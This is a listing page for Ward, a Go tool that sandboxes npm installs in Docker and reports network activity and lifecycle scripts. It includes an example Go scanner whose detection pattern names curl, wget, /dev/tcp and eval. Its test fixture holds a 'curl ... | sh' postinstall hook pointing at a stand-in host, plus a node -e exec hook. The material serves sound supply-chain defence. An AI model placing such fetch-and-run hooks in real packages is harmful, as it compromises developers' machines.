Show HN: New NPM Supplychain Attack?
Category: security
Tags: npm, supply-chain, docker, security-audit, cli
Score: 6.0/10 (Innovation: 5, Technical: 6, Documentation: 7, Utility: 6)
Ward is a Go CLI tool that runs npm install inside a Docker container, records the outbound network connections the install makes and the lifecycle scripts (preinstall, install, postinstall) it executes, and prints a security summary before copying the resulting node_modules to the host. Pairing container isolation with network-traffic analysis for npm installs addresses a real supply-chain gap in a practical way: install-time scripts are a common vehicle for malicious npm packages, and they normally run on the developer's machine, with full network access, before anyone has looked at them. The summary reflects only what the install did inside the container, so a package that behaves differently when it detects a sandbox, or whose payload runs only when the module is later required, will not show up in it.
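As an added example (not Ward's own code, and not part of the original listing), the lifecycle-script half of the audit described above: a Go program that walks a node_modules tree, extracts the hooks npm runs automatically for every installed dependency, and flags commands that match a simple heuristic. The package names, the commands, and the heuristic pattern are constructed for illustration and are assumptions of this example; the network-traffic half depends on capturing the container's connections and is not shown.

```go
package main

import (
	"encoding/json"
	"fmt"
	"io/fs"
	"os"
	"path/filepath"
	"regexp"
)

// lifecycleHooks are the scripts npm runs automatically for every installed
// dependency during npm install; other "scripts" entries never run on the consumer.
var lifecycleHooks = []string{"preinstall", "install", "postinstall"}

// suspicious is a deliberately simple heuristic (an assumption of this example,
// not Ward's rule set): shell fragments a library's install hook rarely needs.
var suspicious = regexp.MustCompile(`(?i)(\b(curl|wget|base64|eval|powershell)\b|node\s+-e\b|bash\s+-c\b|/dev/tcp)`)

// Finding is one lifecycle hook declared by one package.
type Finding struct {
	Package string
	Hook    string
	Command string
	Flagged bool // Command matched the suspicious heuristic
}

type pkgJSON struct {
	Name    string            `json:"name"`
	Scripts map[string]string `json:"scripts"`
}

// AuditPackageJSON parses one package.json and returns a Finding for every
// lifecycle hook it declares, in the order npm would run them.
func AuditPackageJSON(data []byte) ([]Finding, error) {
	var p pkgJSON
	if err := json.Unmarshal(data, &p); err != nil {
		return nil, err
	}
	var out []Finding
	for _, hook := range lifecycleHooks {
		cmd, ok := p.Scripts[hook]
		if !ok {
			continue
		}
		out = append(out, Finding{Package: p.Name, Hook: hook, Command: cmd, Flagged: suspicious.MatchString(cmd)})
	}
	return out, nil
}

// ScanTree walks a node_modules directory, including the nested node_modules of
// transitive dependencies, and audits every package.json it finds. A malformed
// package.json is reported on stderr and skipped rather than aborting the scan.
func ScanTree(root string) ([]Finding, error) {
	var all []Finding
	err := filepath.WalkDir(root, func(path string, d fs.DirEntry, err error) error {
		if err != nil {
			return err
		}
		if d.IsDir() || d.Name() != "package.json" {
			return nil
		}
		data, err := os.ReadFile(path)
		if err != nil {
			return err
		}
		findings, err := AuditPackageJSON(data)
		if err != nil {
			fmt.Fprintf(os.Stderr, "skip %s: %v\n", path, err)
			return nil
		}
		all = append(all, findings...)
		return nil
	})
	return all, err
}

// WriteFixture creates a constructed node_modules tree under root. The package
// names and commands are invented for this example; none of them is a real package.
func WriteFixture(root string) error {
	files := map[string]string{
		"node_modules/plain/package.json":        `{"name":"plain","version":"1.0.0"}`,
		"node_modules/native-addon/package.json": `{"name":"native-addon","scripts":{"install":"node-gyp rebuild","test":"jest"}}`,
		"node_modules/evil-pkg/package.json":     `{"name":"evil-pkg","scripts":{"postinstall":"curl -s https://example.invalid/p | sh"}}`,
		"node_modules/native-addon/node_modules/nested-evil/package.json": `{"name":"nested-evil","scripts":{"preinstall":"node -e \"require('child_process').exec('id')\""}}`,
	}
	for rel, content := range files {
		p := filepath.Join(root, rel)
		if err := os.MkdirAll(filepath.Dir(p), 0o755); err != nil {
			return err
		}
		if err := os.WriteFile(p, []byte(content), 0o644); err != nil {
			return err
		}
	}
	return nil
}

func main() {
	dir, err := os.MkdirTemp("", "ward-example")
	if err != nil {
		panic(err)
	}
	defer os.RemoveAll(dir)
	if err := WriteFixture(dir); err != nil {
		panic(err)
	}
	findings, err := ScanTree(filepath.Join(dir, "node_modules"))
	if err != nil {
		panic(err)
	}
	for _, f := range findings {
		mark := "ok  "
		if f.Flagged {
			mark = "FLAG"
		}
		fmt.Printf("%s %-14s %-11s %s\n", mark, f.Package, f.Hook, f.Command)
	}
}
```

Two points the fixture is built to show: the "test" script of native-addon is ignored because npm install never runs it for a dependency, and its "node-gyp rebuild" install hook is reported but not flagged, since legitimate native add-ons need exactly that. A flagged hook is a prompt for a human to read the command, not a verdict, and the nested-evil case shows why the walk must descend into nested node_modules rather than stop at the top level.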
Target audience: backend devs, devops, security engineers
Repository: https://github.com/AdamGonda/ward · Go · MIT
View on Hacker News